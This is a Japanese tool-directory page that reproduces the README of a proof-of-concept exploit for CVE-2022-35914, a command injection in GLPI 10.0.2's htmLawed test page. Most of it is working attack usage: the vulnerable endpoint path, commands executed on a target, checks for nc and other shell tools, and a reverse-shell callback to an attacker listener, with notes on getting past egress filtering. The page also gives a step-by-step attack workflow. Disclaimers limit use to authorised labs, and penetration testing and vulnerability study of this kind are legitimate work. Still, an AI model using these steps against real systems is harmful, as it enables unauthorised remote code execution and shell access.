Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-35914-RCE — CVE-2022-35914 用 PoC エクスプロイト — GLPI v.10.0.2 htmLawed のコマンドインジェクション、コマンド実行、およびリバースシェルサポート | Kitploit
ツール/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

CVE-2022-35914 用 PoC エクスプロイト — GLPI v.10.0.2 htmLawed のコマンドインジェクション、コマンド実行、およびリバースシェルサポート

リポジトリを見る
141ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-35914 by cyb3rk0ala

CVE-2022-35914 のPoCです。脆弱なGLPIインストールにおける htmLawed テストコンポーネントに関連するコマンドインジェクション脆弱性です。

このツールは脆弱なエンドポイントを通じてコマンド実行を提供し、許可されたラボ環境向けのオプションのコールバック機能を含みます。

免責事項: このプロジェクトは、許可されたセキュリティテスト、CTF、OffSec/PGラボ、および教育目的のみを対象としています。明示的な許可なくシステムに対して使用しないでください。


脆弱性

項目詳細
CVECVE-2022-35914
ソフトウェアGLPI v.10.0.2
コンポーネントhtmLawed
脆弱なエンドポイント/vendor/htmlawed/htmlawed/htmLawedTest.php

脆弱なコンポーネントは、影響を受けるインストールにおいて細工されたパラメータを通じてコマンド実行を可能にする可能性があります。


機能

  • コマンド実行
  • ターゲットURLの自動構築
  • 設定可能なターゲットHTTPポート
  • セッション/トークンの自動取得
  • コマンド出力の抽出
  • ターゲットチェック
  • カスタムUser-Agentのサポート
  • オプションのコールバック設定
  • 色付きターミナル出力
  • Python 3 CLIインターフェース

要件

Python 3および必要な依存関係。

Kali Linux

sudo apt install python3-requests python3-bs4

仮想環境

python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

インストール

リポジトリをクローンします:

git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

スクリプトに実行権限を付与します:

chmod +x glpi.py

使用方法

ヘルプ

python3 glpi.py -h

基本的なコマンド実行

python3 glpi.py -u TARGET_IP -c 'id'

出力例:

[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

コマンド実行

-c オプションは実行するコマンドを指定します。

現在のユーザー

python3 glpi.py -u TARGET_IP -c 'whoami'

現在の権限

python3 glpi.py -u TARGET_IP -c 'id'

オペレーティングシステム

python3 glpi.py -u TARGET_IP -c 'uname -a'

利用可能なユーティリティ

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

オプション

オプション説明デフォルト
-u, --urlターゲットURLまたはIPアドレス必須
-c, --cmd実行するコマンドid
--checkコマンドを実行せずにターゲットをチェック無効
--user-agentカスタムHTTP User-Agentデフォルト
-p, --rportターゲットHTTPサービスポート80
-l, --lhostコールバック/リスナーIPアドレス—
-lp, --lportコールバック/リスナーポート—

ターゲットポート

-p / --rport オプションは、脆弱なGLPI Webサービスが実行されているポートを指定します。

デフォルト:

80

例:

python3 glpi.py -u TARGET_IP -p 80 -c 'id'

ターゲットチェック

--check を使用して、コマンドを実行せずにhtmLawedテストページが利用可能か確認します:

python3 glpi.py -u TARGET_IP --check

カスタムUser-Agent

カスタムHTTP User-Agentは次のように指定できます:

python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

リバースシェル

スクリプトはオプションのコールバックパラメータをサポートしています:

-l   Callback/listener IP
-lp  Callback/listener port

例:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

この例では:

Target:   TARGET_IP:80
Callback: LHOST:80

2つのポートは異なる目的を持ちます:

-p   = Target GLPI HTTP port
-lp  = Callback/listener port

OffSecラボに関する注意

OffSecラボ環境でのテスト中、コールバックは TCPポート80 で正常に動作しました。

4444 など他のコールバックポートは、ラボネットワークや外向きフィルタリングによってタイムアウトする可能性があります。

テストされた環境では:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

リスナーはKali VPNインターフェース上でTCPポート 80 を使用して設定されました。

重要: コールバックにポート80を使用することは環境固有の観察です。これはCVE-2022-35914の要件ではありません。


トラブルシューティング

コマンド実行は動作するがコールバックが動作しない

まずコマンド実行を確認します:

python3 glpi.py -u TARGET_IP -c 'id'

必要なユーティリティが存在するか確認します:

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

コマンド実行は動作するがコールバックがタイムアウトする場合は、VPNルーティングとコールバックポートを確認してください。


コマンド出力が正しくないように見える

コマンド出力の解析が失敗した場合、完全なHTTPレスポンスが次に保存されます:

/tmp/glpi.html

次のコマンドで確認します:

less /tmp/glpi.html

または:

mousepad /tmp/glpi.html

ワークフロー例

1. ターゲットをチェック

python3 glpi.py \
    -u TARGET_IP \
    --check

2. コマンド実行を確認

python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. 現在のユーザーを特定

python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. 利用可能なツールを確認

python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. コールバックを設定

テストされたOffSecラボ環境では:

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

免責事項

このプロジェクトは教育および許可されたセキュリティテストの目的のみで提供されています。

作者は、このソフトウェアに関連するいかなる誤用、損害、不正アクセス、または違法行為についても責任を負いません。

システムをテストする前に、常に明示的な許可を取得してください。


作者

cyb3rk0ala


CVE

CVE-2022-35914


プロジェクト

CVE-2022-35914 by cyb3rk0ala

ツールをダウンロード